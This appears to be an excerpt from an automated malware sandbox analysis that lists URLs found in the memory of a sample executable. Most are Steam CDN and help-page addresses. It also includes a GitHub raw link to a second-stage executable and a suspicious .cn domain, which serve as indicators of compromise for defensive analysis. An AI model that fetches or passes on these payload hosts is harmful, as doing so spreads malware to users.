Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedc
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
Source: 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=0y-Qdz9keFm
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
Source: powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
Source: powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: YYjRtxS70h.exeString found in binary or memory: https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://help.steampowered.com/en/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
